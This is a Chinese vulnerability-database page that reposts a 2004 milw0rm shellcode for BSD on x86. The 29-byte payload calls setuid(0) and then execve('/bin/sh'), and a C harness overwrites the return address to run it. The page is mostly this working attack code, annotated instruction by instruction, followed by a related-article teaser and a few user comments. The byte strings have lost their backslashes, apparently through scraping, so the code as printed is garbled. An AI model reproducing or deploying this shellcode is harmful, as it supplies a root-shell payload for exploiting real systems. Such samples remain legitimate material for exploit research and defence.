BSD/x86 – execve(/bin/sh) + setuid(0) Shellcode (29 bytes)
漏洞ID | 1054690 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
[email protected]
29 bytes.
-setuid(0);
-execve(/bin/sh);
*/
char shellcode[]=
"x31xc0" // xor %eax,%eax
"x50" // push %eax
"xb0x17" // mov $0x17,%al
"x50" // push %eax
"xcdx80" // int $0x80
"x50" // push %eax
"x68x6ex2fx73x68" // push $0x68732f6e
"x68x2fx2fx62x69" // push $0x69622f2f
"x89xe3" // mov %esp,%ebx
"x50" // push %eax
"x54" // push %esp
"x53" // push %ebx
"x50" // push %eax
"xb0x3b" // mov $0x3b,%al
"xcdx80"; // int $0x80
main()
{
int *ret;
printf("Shellcode lenght=%dn",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]
相关推荐: Cisco Resource Manager信息泄露漏洞
Cisco Resource Manager信息泄露漏洞 漏洞ID 1206716 漏洞类型 未知 发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1042 CNNVD-ID CNNVD-199912-174 漏洞…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666